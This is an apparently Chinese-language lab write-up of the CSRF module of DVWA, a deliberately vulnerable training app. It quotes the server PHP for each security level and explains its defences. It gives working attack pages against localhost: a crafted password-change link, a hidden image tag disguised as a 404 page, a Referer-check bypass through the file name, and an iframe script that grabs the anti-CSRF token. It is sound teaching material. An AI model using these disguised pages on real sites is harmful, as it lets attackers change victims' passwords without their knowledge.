系統(tǒng)環(huán)境
因?yàn)榫W(wǎng)上關(guān)于dvwa的相關(guān)資料都比較舊,所以想重新過一邊dvwa的各個(gè)類型的漏洞,順帶初步入門php代碼審計(jì)相關(guān)的知識(shí)。環(huán)境安裝可以直接參照網(wǎng)上教程新手指南:手把手教你如何搭建自己的滲透測(cè)試環(huán)境,已經(jīng)寫的非常詳細(xì),可以直接按照教程一步步安裝。
簡(jiǎn)介
CSRF,全稱Cross-site request forgery,翻譯過來就是跨站請(qǐng)求偽造,是指利用受害者尚未失效的身份認(rèn)證信息(cookie、會(huì)話等),誘騙其點(diǎn)擊惡意鏈接或者訪問包含攻擊代碼的頁面,在受害人不知情的情況下以受害者的身份向(身份認(rèn)證信息所對(duì)應(yīng)的)服務(wù)器發(fā)送請(qǐng)求,從而完成非法操作(如轉(zhuǎn)賬、改密等)。CSRF與XSS最大的區(qū)別就在于,CSRF并沒有盜取cookie而是直接利用。在2013年發(fā)布的新版OWASP Top 10中,CSRF排名第8
CSRF
接下來就對(duì)四種級(jí)別的代碼進(jìn)行分析
Low服務(wù)器端核心代碼
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
可以看到 代碼接收密碼參數(shù)會(huì)檢查password_new,password_conf是否相同,除此以外并沒有其他條件的限制。沒任何防CSRF機(jī)制。
漏洞利用
構(gòu)造鏈接:
http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#
當(dāng)受害者點(diǎn)擊了這個(gè)鏈接,他的密碼就會(huì)被改成123456,(但是這這種攻擊一看就能看出來是修改密碼的,而且受害者點(diǎn)擊了鏈接之后看到這個(gè)頁面就會(huì)知道自己的密碼被篡改了)
修改成功
另外再提一點(diǎn),CSRF是利用受害者的cookies向服務(wù)器偽造請(qǐng)求,所以如果之前用的是firefox瀏覽器登陸這個(gè)系統(tǒng),而現(xiàn)在用chrome瀏覽器點(diǎn)擊這個(gè)鏈接,攻擊是不會(huì)觸發(fā)的,因?yàn)閏hrome瀏覽器不能利用firefox瀏覽器的cookies,所以自動(dòng)跳轉(zhuǎn)到登陸界面。
自動(dòng)跳轉(zhuǎn)
因?yàn)楣翩溄语@而易見,所以我們需要對(duì)鏈接做一些處理,比如說使用短鏈接來隱藏url
比如說百度短鏈接
image.png
但是使用短鏈接,受害者依然可以看到密碼被修改的提示,并沒有多么高明,所以需要進(jìn)一步偽裝,可以構(gòu)造攻擊頁面誘騙受害者去訪問。
這里寫在本地寫一個(gè)攻擊頁面
<img src="[http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#](http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#)" border="0" style="display:none;"/>
<h1>404<h1> |
<h2>file not found.<h2>
當(dāng)受害者訪問test.html時(shí),會(huì)誤認(rèn)為是自己點(diǎn)擊的是一個(gè)失效的url,但實(shí)際上已經(jīng)遭受了CSRF攻擊,密碼已經(jīng)被修改為了123456
密碼修改
Medium服務(wù)器端核心代碼
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
}
else {
// Didn't come from a trusted source
echo "<pre>That request didn't look correct.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
相關(guān)函數(shù)說明
int eregi(string pattern, string string)
檢查string中是否含有pattern(不區(qū)分大小寫),如果有返回True,反之False。
可以看到,Medium級(jí)別的代碼檢查了保留變量 HTTP_REFERER(http包頭的Referer參數(shù)的值,表示來源地址)中是否包含SERVER_NAME(http包頭的Host參數(shù),及要訪問的主機(jī)名,這里是localhost),希望通過這種機(jī)制抵御CSRF攻擊
image.png
漏洞利用
過濾規(guī)則中表明referer中必須包含主機(jī)名這里是localhost,所以我們就將攻擊頁面的命名修改為localhost.html就可以繞過了。
image.png
image.png
這里因?yàn)槲矣玫倪€是本地的機(jī)器,你可以假設(shè)第一個(gè)localhost為其他的地址例如是http://xxxx/localhost.html
High服務(wù)器端核心代碼
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
// Generate Anti-CSRF token
generateSessionToken();
?>
可以看到,High級(jí)別的代碼加入了Anti-CSRF token機(jī)制,用戶每次訪問改密頁面時(shí),服務(wù)器會(huì)返回一個(gè)隨機(jī)的token,向服務(wù)器發(fā)起請(qǐng)求時(shí),需要提交token參數(shù),而服務(wù)器在收到請(qǐng)求時(shí),會(huì)優(yōu)先檢查token,只有token正確,才會(huì)處理客戶端的請(qǐng)求。
漏洞利用
要繞過High級(jí)別的反CSRF機(jī)制,關(guān)鍵是要獲取token,要利用受害者的cookie去修改密碼的頁面獲取關(guān)鍵的token。試著去構(gòu)造一個(gè)攻擊頁面,將其放置在攻擊者的服務(wù)器,引誘受害者訪問,從而完成CSRF攻擊,下面是代碼。
<script type="text/javascript">
function attack()
{
document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
document.getElementById("transfer").submit();
}
</script>
<iframe src="http://localhost/DVWA-master/vulnerabilities/csrf" id="hack" border="0" style="display:none;">
</iframe>
<body onload="attack()">
<form method="GET" id="transfer" action="http://localhost/DVWA-master/vulnerabilities/csrf">
<input type="hidden" name="password_new" value="password">
<input type="hidden" name="password_conf" value="password">
<input type="hidden" name="user_token" value="">
<input type="hidden" name="Change" value="Change">
</form>
</body>
攻擊思路是當(dāng)受害者點(diǎn)擊進(jìn)入這個(gè)頁面,腳本會(huì)通過一個(gè)看不見框架偷偷訪問修改密碼的頁面,獲取頁面中的token,并向服務(wù)器發(fā)送改密請(qǐng)求,以完成CSRF攻擊。在本地環(huán)境下可以實(shí)現(xiàn)
image.png
然而理想與現(xiàn)實(shí)的差距是巨大的,這里牽扯到了跨域問題,而現(xiàn)在的瀏覽器是不允許跨域請(qǐng)求的。這里簡(jiǎn)單解釋下跨域,我們的框架iframe訪問的地址是[http://hack/dvwa/vulnerabilities/csrf],位于服務(wù)器localhost上,而我們的攻擊頁面位于黑客服務(wù)器hack上,兩者的域名不同,域名B下的所有頁面都不允許主動(dòng)獲取域名A下的頁面內(nèi)容,除非域名A下的頁面主動(dòng)發(fā)送信息給域名B的頁面,所以我們的攻擊腳本是不可能取到改密界面中的user_token。
由于跨域是不能實(shí)現(xiàn)的,所以我們要將攻擊代碼注入到目標(biāo)服務(wù)器localhost中,才有可能完成攻擊。所以單純從CSRF未能突破High級(jí)別。
Impossible服務(wù)器端核心代碼
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$pass_curr = $_GET[ 'password_current' ];
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Sanitise current password input
$pass_curr = stripslashes( $pass_curr );
$pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_curr = md5( $pass_curr );
// Check that the current password is correct
$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
$data->execute();
// Do both new passwords match and does the current password match the user?
if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
// It does!
$pass_new = stripslashes( $pass_new );
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update database with new password
$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
$data->execute();
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match or current password incorrect.</pre>";
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
可以看到,Impossible級(jí)別的代碼利用PDO技術(shù)防御SQL注入,至于防護(hù)CSRF,則要求用戶輸入原始密碼(簡(jiǎn)單粗暴),攻擊者在不知道原始密碼的情況下,無論如何都無法進(jìn)行CSRF攻擊。
